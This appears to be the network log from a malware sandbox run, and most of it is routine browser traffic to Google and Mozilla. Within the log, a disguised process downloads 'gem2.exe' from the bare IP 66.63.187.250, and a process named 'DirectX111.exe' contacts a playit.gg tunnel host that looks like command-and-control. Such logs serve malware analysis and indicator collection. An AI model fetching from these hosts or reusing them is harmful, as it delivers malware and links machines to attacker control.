HTTP Request

GET https://workspace.google.com/assets/80078c6d.min.js

HTTP Request

GET https://workspace.google.com/assets/a9e19642.min.js

HTTP Request

GET https://workspace.google.com/assets/c64600aa.min.js

HTTP Request

GET https://workspace.google.com/assets/cd9c842e.min.js

HTTP Request

GET https://workspace.google.com/assets/00adf923.min.js

HTTP Request

GET https://workspace.google.com/assets/5e53e9e0.min.js

HTTP Request

GET https://workspace.google.com/assets/7a4d51ed.min.js

HTTP Request

GET https://workspace.google.com/assets/197ab810.min.js

HTTP Request

GET https://workspace.google.com/assets/687e7157.min.js

HTTP Request

GET https://workspace.google.com/assets/1c6fe6ad.min.js

HTTP Request

GET https://workspace.google.com/assets/fb0914da.min.js

HTTP Request

GET https://workspace.google.com/assets/7ffa16ea.min.js

HTTP Request

GET https://workspace.google.com/assets/b59f5798.min.js

HTTP Request

GET https://workspace.google.com/assets/7ff80ebe.min.js

HTTP Request

GET https://workspace.google.com/assets/d0a0376a.min.js

HTTP Request

GET https://workspace.google.com/assets/f8727730.min.js
142.250.200.33:443

lh3.googleusercontent.com

tls, http2

chrome.exe

1.1kB
10.8kB
10
11
142.250.200.33:443

https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE=e365-pa-nu-s0-rw

tls, http2

chrome.exe

107.6kB
4.8MB
2222
3469

HTTP Request

GET https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455

HTTP Request

GET https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE

HTTP Request

GET https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe

HTTP Request

GET https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt

HTTP Request

GET https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE=e365-pa-nu-s0-rw
216.58.204.91:443

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg

tls, http2

chrome.exe

2.3kB
19.8kB
18
21

HTTP Request

GET https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg

HTTP Request

GET https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg
216.58.204.91:443

storage.googleapis.com

tls, http2

chrome.exe

999 B
5.6kB
9
8
216.58.201.106:443

https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSIAmQPV0x4uaegxIFDQ-obAwSBQ3-OcPhIWJhcZEEvqEs?alt=proto

tls, http2

chrome.exe

1.8kB
6.7kB
13
14

HTTP Request

GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSIAmQPV0x4uaegxIFDQ-obAwSBQ3-OcPhIWJhcZEEvqEs?alt=proto
216.239.34.36:443

https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736790032880&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=239575487.1736790034&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736790033&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x680&ep.is_rivendell=true&ep.is_eea=false&tfd=1723

tls, http2

chrome.exe

2.6kB
7.1kB
14
13

HTTP Request

POST https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736790032880&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=239575487.1736790034&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736790033&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x680&ep.is_rivendell=true&ep.is_eea=false&tfd=1723
142.250.178.14:443

https://apis.google.com/js/client.js

tls, http2

chrome.exe

2.0kB
12.6kB
16
17

HTTP Request

GET https://apis.google.com/js/client.js
127.0.0.1:50183

firefox.exe
127.0.0.1:50193

firefox.exe
151.101.131.19:443

https://www.mozilla.org/media/img/favicons/firefox/browser/favicon.f093404c0135.ico

tls, http2

firefox.exe

10.6kB
464.0kB
122
392

HTTP Request

GET https://www.mozilla.org/firefox/welcome/21/

HTTP Response

302

HTTP Request

GET https://www.mozilla.org/en-US/firefox/welcome/21/

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/js/site.b49d941e3374.js

HTTP Request

GET https://www.mozilla.org/media/css/m24-root.77a146bcaf17.css

HTTP Request

GET https://www.mozilla.org/media/css/m24-navigation-and-footer.e8f9c32ba5aa.css

HTTP Request

GET https://www.mozilla.org/media/css/protocol-firefox.e581097aaf66.css

HTTP Request

GET https://www.mozilla.org/media/css/protocol-picto.cfee40a3cd36.css

HTTP Request

GET https://www.mozilla.org/media/css/firefox_welcome_page19_to_24.3bad9ee2f487.css

HTTP Request

GET https://www.mozilla.org/media/js/gtm-snippet.b5b7c885f8fa.js

HTTP Request

GET https://www.mozilla.org/media/img/logos/firefox/logo-word-hor.f3b18871b657.svg

HTTP Request

GET https://www.mozilla.org/media/js/sentry.ca22623b11b1.js

HTTP Request

GET https://www.mozilla.org/media/js/lib.7cb1e204ce21.js

HTTP Request

GET https://www.mozilla.org/media/js/fxa.6cacc544775b.js

HTTP Request

GET https://www.mozilla.org/media/js/data.438fd3539700.js

HTTP Request

GET https://www.mozilla.org/media/js/m24-ui.daf79f0fefd7.js

HTTP Request

GET https://www.mozilla.org/media/js/glean.ff7106b49b39.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/js/firefox_welcome_page19_to_24.87e13c35e608.js

HTTP Request

GET https://www.mozilla.org/media/js/consent-banner.f74bb4c07d16.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/protocol/fonts/Inter-Bold.0564381b22b2.woff2

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/protocol/img/icons/social/x/white.7f50edd82090.svg

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/protocol/img/icons/social/instagram/white.a7014a6150b3.svg

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/protocol/img/icons/social/linkedin/white.cdc0e910cc1e.svg

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/protocol/img/icons/social/tiktok/white.599403de7ac0.svg

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/protocol/img/icons/social/spotify/white.aa5334e85bae.svg

HTTP Request

GET https://www.mozilla.org/media/protocol/img/icons/social/youtube/white.4f314c43c69d.svg

HTTP Request

GET https://www.mozilla.org/media/img/icons/m24-small/globe-white.a76258f6a4cc.svg

HTTP Request

GET https://www.mozilla.org/media/img/icons/m24-small/down-caret-white.3aab868855c7.svg

HTTP Request

GET https://www.mozilla.org/media/protocol/fonts/Inter-Regular.d55e957612a3.woff2

HTTP Request

GET https://www.mozilla.org/media/protocol/fonts/Metropolis-Bold.6a80125e795a.woff2

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/fonts/m24/mozilla-text/MozillaText-SemiBold.c9ce5296db65.woff2

HTTP Request

GET https://www.mozilla.org/media/fonts/m24/mozilla-text/MozillaText-Regular.3fa5c88b0954.woff2

HTTP Request

GET https://www.mozilla.org/media/img/firefox/welcome/page20-21/back-up.b351cf7c2c5c.svg

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/img/firefox/welcome/page20-21/add-ons.809f56bff087.svg

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/img/firefox/welcome/page20-21/community.bf0cb1c38902.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.mozilla.org/media/img/favicons/firefox/browser/favicon-196x196.59e3822720be.png

HTTP Request

GET https://www.mozilla.org/media/img/favicons/firefox/browser/favicon.f093404c0135.ico

HTTP Response

200

HTTP Response

200
151.101.131.19:443

www-mozilla.fastly-edge.com

firefox.exe

98 B
52 B
2
1
172.217.169.78:80

http://drive.google.com/

http

firefox.exe

1.1kB
1.1kB
17
15

HTTP Request

GET http://drive.google.com/

HTTP Response

301
172.217.169.78:80

drive.google.com

firefox.exe

190 B
92 B
4
2
172.217.169.78:443

https://drive.google.com/

tls, http2

firefox.exe

2.1kB
9.6kB
17
18

HTTP Request

GET https://drive.google.com/
142.251.173.84:443

https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1

tls, http2

firefox.exe

2.3kB
6.8kB
16
19

HTTP Request

GET https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1
142.250.187.196:443

https://www.google.com/intl/en-US/drive/

tls, http2

firefox.exe

2.2kB
6.1kB
16
18

HTTP Request

GET https://www.google.com/intl/en-US/drive/
142.250.200.46:443

https://workspace.google.com/intl/en-US/products/drive/

tls, http2

firefox.exe

2.5kB
52.3kB
22
49

HTTP Request

GET https://workspace.google.com/intl/en-US/products/drive/
142.250.200.33:443

https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw

tls, http2

firefox.exe

78.6kB
4.2MB
1394
3039

HTTP Request

GET https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE

HTTP Request

GET https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe

HTTP Request

GET https://lh3.googleusercontent.com/qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455

HTTP Request

GET https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt

HTTP Request

GET https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw

HTTP Request

GET https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw

HTTP Request

GET https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw
66.63.187.250:80

http://66.63.187.250/zmk/gem2.exe

http

._cache_New Text Document mod.exe

40.7kB
3.0MB
852
2135

HTTP Request

GET http://66.63.187.250/zmk/gem2.exe

HTTP Response

200
172.217.16.251:443

storage.googleapis.com

tls, http2

firefox.exe

1.4kB
5.1kB
10
9
172.217.16.251:443

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg

tls, http2

firefox.exe

2.6kB
19.3kB
23
24

HTTP Request

GET https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg

HTTP Request

GET https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg
142.250.178.8:443

https://ssl.google-analytics.com/ga.js

tls, http2

firefox.exe

2.2kB
24.5kB
21
26

HTTP Request

GET https://ssl.google-analytics.com/ga.js
64.233.184.156:443

https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-18073-34&cid=230335749.1736790046&jid=1866785601&gjid=1277687835&_gid=146379914.1736790046&_u=YCDAiEABDAAAAGgBI~&z=991859826

tls, http2

firefox.exe

2.2kB
6.4kB
17
16

HTTP Request

POST https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-18073-34&cid=230335749.1736790046&jid=1866785601&gjid=1277687835&_gid=146379914.1736790046&_u=YCDAiEABDAAAAGgBI~&z=991859826
216.239.34.36:443

https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736790044845&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102123607~102198178&ul=en&cid=230335749.1736790046&sr=1280x720&_ng=1&ir=1&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736790045&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x680&ep.is_rivendell=true&tfd=2147

tls, http2

firefox.exe

2.7kB
6.7kB
16
17

HTTP Request

POST https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736790044845&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102123607~102198178&ul=en&cid=230335749.1736790046&sr=1280x720&_ng=1&ir=1&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736790045&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x680&ep.is_rivendell=true&tfd=2147
142.250.178.14:443

https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs

tls, http2

firefox.exe

3.9kB
127.4kB
50
105

HTTP Request

GET https://apis.google.com/js/client.js

HTTP Request

GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs
142.250.200.33:443

lh3.googleusercontent.com

tls, http2

firefox.exe

1.8kB
10.6kB
17
17
172.217.16.251:443

storage.googleapis.com

tls, http2

firefox.exe

1.8kB
5.4kB
17
14
142.250.179.234:443

https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__

tls, http2

firefox.exe

2.5kB
12.2kB
18
24

HTTP Request

GET https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__
142.250.178.14:443

accounts.youtube.com

tls, http2

firefox.exe

1.4kB
7.6kB
10
10
142.250.179.238:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

firefox.exe

3.3kB
9.8kB
18
23

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true&authuser=0

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true&authuser=0
142.250.179.238:443

play.google.com

tls, http2

firefox.exe

1.3kB
7.6kB
9
9
142.250.179.238:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

firefox.exe

2.4kB
8.6kB
20
21

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
142.250.179.238:443

play.google.com

tls, http2

firefox.exe

1.4kB
7.6kB
11
10
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
142.250.178.14:443

https://accounts.youtube.com/accounts/SetSID?ssdc=1&sidt=ALWU2ctBeTcJk3yQyWzv7p5ftZ7BXiSiQCXbOMLPsnWu2syjTUhownMORHCrbTY6rklElEAO92evqnnriFVQ7nX2VhP7cU12k4HA8YyF%2B9JWL/MLDQzwV9s40uWz4H9R7p9RJBNE08ibeNYyPGfma8Q2pgiQBwTw0xXiX3261HSoGT%2BMvl75G%2BwRm8mFtueNIELot4LDB7LjQAj1sgOmdtc/zfjjSpwFjmR76TDC/ILS14crxDv7oU7z7NdwhlMazUuWTp/RLmCigwnBuABInkYvw1%2BNI2EPcjtZk6WngN%2B1au9NSjfu1P0/9BLilD3q/ObM28fxlpoMD3atZiS3lRF5MIPO8UnaCAbdPURKD6SqC2fX%2BTij63Jo9dcA%2BsmlVHobUqXnP3ErdSyCXD1YTqcj/7mWoHEgJUatcvKLcukZsOrreu4kkZ4HxX3j7Iu6TMRr0t%2BQ1qO3k6P801c3ZgJL4IE1jKQQ7TA4A94WW1mYfd3B3JFSnLfAJfXmX7wLwUmy0Jb8LGSOryx2ziaCS1gCb95VOf7KoiP5tgp9Ok11TFkI2hWhofFTgaWuZZEg09SIaJmOXhjKAKaVKA/N1xCSV9TFld7nnf81cSJtV4Ie/nnJeCp/4MFGW6sDjC1hrH628276qY2PuOx6OMn8VYvRL4VKg4CUNYZ7VCK8